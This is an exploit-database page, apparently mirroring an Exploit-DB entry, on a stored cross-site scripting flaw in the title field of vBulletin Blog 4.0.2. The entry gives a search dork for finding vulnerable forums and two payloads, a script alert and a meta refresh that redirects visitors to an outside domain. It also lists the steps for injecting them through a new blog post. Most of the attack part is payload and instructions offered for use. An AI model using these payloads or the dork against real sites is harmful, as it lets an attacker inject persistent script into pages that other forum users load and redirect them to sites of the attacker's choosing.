Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbFormatXformatEDB-ID:11871
HistoryMar 24, 2010 - 12:00 a.m.

vBulletin Blog 4.0.2 - Title Cross-Site Scripting

2010-03-2400:00:00
FormatXformat
www.exploit-db.com
907

7.4 High

AI Score

Confidence

Low

JSON
Vbulletin Blog 4.0.2 XSS Vulnerability

Author: FormatXformat
Version: Vbulletin 4.0.2


Dork:
Powered by vBulletinโ„ข  Version 4.0.2 Copyright ยฉ 2010 vBulletin Solutions, Inc. All rights reserved.


The script is affected by Permanent XSS vulnerability, so you can put in bad java script code

<script>alert('put this script in title')</script>
<meta http-equiv='Refresh' content='0;URL=http://db-exploit.com'>

1st register

Go to Blogs page

Create New Post

Inject your java script into Title Box

You must go back to Main page to see this XSS effect.



Greets: Neo, Sa3id, All Tkurd.net Members

7.4 High

AI Score

Confidence

Low

JSON